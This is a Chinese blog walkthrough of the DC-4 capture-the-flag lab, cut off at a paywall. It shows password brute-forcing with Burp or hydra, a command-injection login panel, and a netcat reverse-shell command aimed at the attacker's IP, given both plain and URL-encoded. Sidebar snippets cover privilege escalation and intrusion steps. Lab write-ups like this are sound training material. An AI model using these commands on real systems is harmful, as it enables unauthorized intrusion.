Dc-4靶机渗透----burpsuite抓包与爆破、hydra、sudo、teehee提权、/etc/passwd的使用

最新推荐文章于 2023-06-09 22:08:13 发布
最新推荐文章于 2023-06-09 22:08:13 发布
阅读量597 收藏 7
点赞数 1
分类专栏: 网络安全靶机渗透 文章标签: html web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/z2560088/article/details/120519378
版权

 nmap扫描,扫描出80端口和ssh端口

先访问http服务。再用whatweb和dirb扫描该网站,发现既没有cms有没有相关的文件可以查看

那我们只能抓包爆破,或者海德拉爆破,账号其实有提示了大概就是admin,只需破解password即可

 爆破得到admin:happy

 登录

  继续执行命令抓包

修改radio的值 

使用nc

nc 192.168.160.129 777 -e /bin/bash

 改成nc+192.168.160.129+777+-e+/bin/bash

最低0.47元/天 解锁文章
Zhao蔫儿
关注
专栏目录
/etc/passwd的利用
SHELLCODE_8BIT的博客
04-21 396
http://blog.leanote.com/post/snowming/98864b36fc08
安装phpstudy---测试可用、安装靶机环境、使用burpsuite靶机环境进行抓包
dyx0910的博客
05-12 910
安装phpstudy---测试可用、安装靶机环境、使用burpsuite靶机环境进行抓包
DC-4靶机渗透teehee提权
single_g_l的博客
03-26 4896
一、环境 靶机: 192.168.1.177 攻击机: 192.168.1.209 二、信息收集 1. 主机发现 namp -sP 192.168.1.0/24 或 arp-scan -l # 查看开放端口 nmap -A -sS -p- 192.168.1.177 2. 访问192.168.1.177:80 三、拿到管理后台密码 方法1. 用burp爆破模块,获取管理员登录界面的密码 01. 用burp抓包爆破拿到密码(记得准备一个常用密码合集,...
burpsuite安全练兵场-服务端7】访问控制漏洞和权限提升-11个实验(全)
01-10 8649
【BP靶场portswigger-服务端7-访问控制漏洞和权限提升】11个实验-万文详细步骤
抓包改包拿webshell提权
07-30
抓包改包拿webshell提权
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
手把手教菜鸟抓包改包构造上传漏洞拿shel
05-11
手把手教菜鸟抓包改包构造上传漏洞拿shel
Burpsuite练兵场-目录遍历(含绕过)
weixin_50464560的博客
08-15 3381
0x50 Burpsuite练兵场-目录遍历 这一篇本来是应该介绍HTTP走私的下一章节:如何探查HTTP请求走私漏洞,但是我在做其中一个实验的时候出现了问题,不知道是实验环境本身存在Bug还是我的操作遗漏了关键细节,所以在其官方论坛上提交了一个post,等有回复或者解决了问题后再来更新下一章节吧 就先来介绍下目录遍历(Directory traversal)这一内容吧,先来简单的说一下相关概念,这里的目录遍历不是指我们在信息搜集阶段的路径爆破,而是指攻击者能够通过目录遍历漏洞读取应用程序服务器上的任意文
10.100个渗透测试实战#10(DC-5)
qwsn
03-30 2725
世间一切即可努力 ...
渗透工具】Burpsuite下载安装及使用详解
热门推荐
Z_David_Z的博客
02-02 1万+
目录参考文献0X01 下载安装1.安装jdk1.1配置环境变量1.2测试环境变量配置2.burp suite 破解版下载0X02 使用详解burp suite模块简介1.proxy模块2.Intruder模块3.Repeater模块4.其他模块介绍 参考文献 BurpSuite 实战指南.pdf 链接 提取码:84p8 0X01 下载安装 1.安装jdk 根据电脑环境安装对应的jdk版本 1.1配置环境变量 计算机右键–>属性–>高级系统设置–>环境变量 系统变量–>新建 变量名
vulnhub之Kioptrix Level 2
最新发布
li1136594919的博客
06-09 443
靶机的默认网络方式为桥接,而且改为NAT模式后会自动更改,grud模式也进不去,来来回回折腾了两个小时,都还没搞定IP分配的问题,一度想要删掉靶机
常见端口对应服务及入侵方式
爱是与世界平行
03-13 3178
常见端口对应服务及入侵方式一、端口服务及利用简析1.1 文件共享服务端口1.2 远程连接服务端口1.3 Web应用服务端口1.4 数据库端口服务1.5 邮件服务端口1.6 网络常见协议端口1.7 特殊服务端口二、端口入侵详情2.1 21端口入侵2.2 23端口入侵2.3 53端口入侵2.4 80端口入侵2.5 135端口入侵2.6 139/445端口入侵2.7 1433端口入侵2.8 1521端口...
计算机端口爆破,Tomcat8080端口爆破及原理 | kTWO-个人博客
weixin_42388680的博客
07-26 1434
Tomcat是非常常见的web服务程序,但是,有些管理员对Tomcat不熟悉,导致配置不当,很容易就会被入侵,使用8080爆破工具扫描很容易就能找到大量的不安全不服气,也很容易被提权,博主之前也使用该工具进行爆破,后来就先弄清楚其原理,经过后来的研究终于弄明白了Tomcat的登陆认证原理。下面进入正题。一、Tomcat基础认证说白了就是登陆tomcat。例子:http://101.201.151....
生命在于学习——Linux提权
易水哲的博客
11-03 1706
Linux提权的学习笔记记录。
vulnhub-five86-1
qq_41810304的博客
02-22 423
下载地址:https://www.vulnhub.com/entry/five86-1,417/ 前言: 作为小白(参考我写过的其他文章前言,懒得再来一遍了) Kali:192.168.1.4 目标机:192.168.1.27 信息收集: 漏洞挖掘: 分别访问80和10000端口。80端口访问后,页面源码如下: 访问10000端口发现登录页面,确认该端口是一个cms网页,但...
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值